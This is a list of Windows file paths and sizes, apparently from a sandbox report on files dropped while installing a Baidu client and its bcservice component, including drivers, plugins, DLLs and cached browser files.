    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-right.png (202 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-fail.html (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\new.png (232 bytes)
    %System%\drivers\BDArKit.sys (673 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BrowserNotify.rdb (14384 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\bdb_scheme.dat (1484 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-rain.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-tooltip-png8.png (329 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-close.png (170 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\BDArKit.sys (140 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\enter.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.ttf (1552 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\FileRecov.dll (189 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\kuaidi.png (312 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings_z.png (11 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-center.png (122 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_g.png (248 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\Software.pb (9984 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxin.png (3 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo_blank.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\executor.xml (187 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Update.dll (11040 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\foggy.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\enter.png (1 bytes)
    %System%\drivers\bduniptk.sys (1425 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\bcservice.exe (1695 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxinNotify.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\10000301.dat (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-storm.png (926 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download-hover.png (985 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\executor.xml (310 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CommonWorker.dll (3712 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\1.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\f\LKHelper.7z (15801 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\DownloadDll.dll (99 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\PluginSetup.xml (612 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\overcast.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\foggy.png (663 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\login\login.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\executor.xml (150 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcr100.dll (51648 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.atl\atl80.dll (97 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\icon_bianqian.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\404.html (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-snow.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\10000302_ad.dat (121 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-ala.png (561 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.crt\msvcp80.dll (1835 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\ReportRecordDll.dll (115 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-left.png (194 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack_z.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\executor.xml (241 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\shower.png (481 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack.css (784 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianDll.dll (16 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\344.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\skinres.rdb (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUI.xml (382 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\ReportDll.dll (140 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\skinres.rdb (784 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-checked.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Utils.dll (46592 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\resouUI.xml (340 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\PluginSetup.xml (622 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-center.png (143 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general-png8.png (841 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall.gif (94 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\privacy.png (296 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ice-rain.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\iframe_loading.gif (784 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Setting.rdb (3712 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BDSearchBar.rdb (6624 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-right.png (259 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\APIMgr.dll (201 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\global.js (8184 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\unknown.png (480 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-foward.png (156 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-png8.png (292 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks.css (9 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general.png (866 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dust.png (812 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Report.dll (7232 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\365.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\loading.png (1552 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-snow.png (992 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\icon-tree-search-ie8.png (15 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\respond.min.js (4 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Base.dll (77808 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog-close.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Heartbeat.dll (14384 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\gz.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\AppHTMLReSou.xml (438 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\duststorm.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\input.png (214 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\weixinUI.xml (345 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\qq.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe (11040 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-refresh.png (215 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-storm.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\PluginSetup.xml (616 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.svg (4992 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\fileverify.xml (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower.png (898 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.crt\microsoft.vc80.crt.manifest (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserFrame.dll (67494 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu.png (367 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDClientProxy.dll (45104 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\executor.xml (172 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-back.png (154 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\UtilsDll.dll (82 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe (24048 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{D104CC61-BA7C-4141-994E-51D88791DBAC}.7z (9049 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\DownSvrList[1].ini (406 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\mm[1] (71033 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\7b1[1] (816682 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\zy[1] (427032 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\7gj1[1] (956170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\2k[1] (1021411 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\ky[1] (628241 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\Baidu_Setup_1.6.200.359_ftn_1050103060[1].exe (681940 bytes)
    %Documents and Settings%\%current user%\Application Data\KuaiZip\report_config.txt (0 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\100093_20131210143252[1].jpg (2253 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\DD_belatedPNG_0.0.8a[1].js (3902 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777190_20150513200601968_255[2].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\impress_bg[1].png (1023 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGX12.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\120060_580689_20151012190739_n[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\weblog[1].htm (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\dot1[1].png (1511 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777159_20150523182929109_255[1].jpg (10884 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190177_20140307182314[1].jpg (2644 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\啤酒16[1].gif (674 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777171_20141013130050828_255[2].jpg (4353 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777190_20150513200601968_255[2].jpg (2275 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\160345_m[1].jpg (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\jquery_v1.8.2[1].js (31937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_play1[2].png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\190188_96453305_20151012164845_n[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\time_bk[1].png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777045_20141127144331328_255[1].jpg (10314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\120077_20150529222638[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\100088_20110913202308[1].jpg (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158882_20150701030552828_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\rom_k_10[1].jpg (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\9158911_20141220003749968_255[1].jpg (3813 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\100180_20121107150045[1].jpg (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\close[1].gif (235 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158603_20150810100123875_255[2].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\180128_m[1].jpg (1340 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_default[1].png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777190_20150513200601968_255[1].jpg (4358 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777171_20141013130050828_255[1].jpg (11719 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\qq[1].gif (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8158278_20150630211810562_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGX10.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\170030_20120813172620[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (164 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\150002_8158525_20150720162456890[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\130188_m[1].jpg (670 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8158293_20151005022233843_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\impress_bg[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\120040_20130621153954[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\150007_20140603231914[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\170068_20140416154958[1].jpg (2252 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\web9158_14[1].css (5542 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\200487_m[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_default[2].png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777159_20150523182929109_255[1].jpg (6092 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777073_20141217193405703_255[1].jpg (6874 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_default[3].png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\medal20[1].png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777171_20141013130050828_255[1].jpg (7478 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777145_20150827182932546_255[1].jpg (3299 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (2340 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\speed_v1[1].js (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\weblog[2].htm (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\160345_m[1].jpg (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGXE.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\rom_k_6[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777045_20141127144331328_255[1].jpg (6025 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158603_20150810100123875_255[1].jpg (6079 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8158603_20150810100123875_255[1].jpg (9126 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGX11.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777190_20150513200601968_255[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190354_m[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580108_20150816173136109_255[1].jpg (3225 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\view[1].htm (907 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\180004_20150719235055[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\people1[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\9158924_20150206021028109_255[1].jpg (2881 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\9158015_20150513013603984_255[1].jpg (3851 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\190149_9158382_20141117132627437[1].jpg (2905 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\DD_belatedPNG_0.0.8a[1].js (1969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\senlinwuhui201592_n[1].jpg (3064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\170159_20130701181900[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580279_20151013101824562_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\580191_20150812230520093_255[1].jpg (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\580327_20150904150143765_255[1].jpg (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\h[1].js (1794 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\100128_20140312235434[1].jpg (1928 bytes)
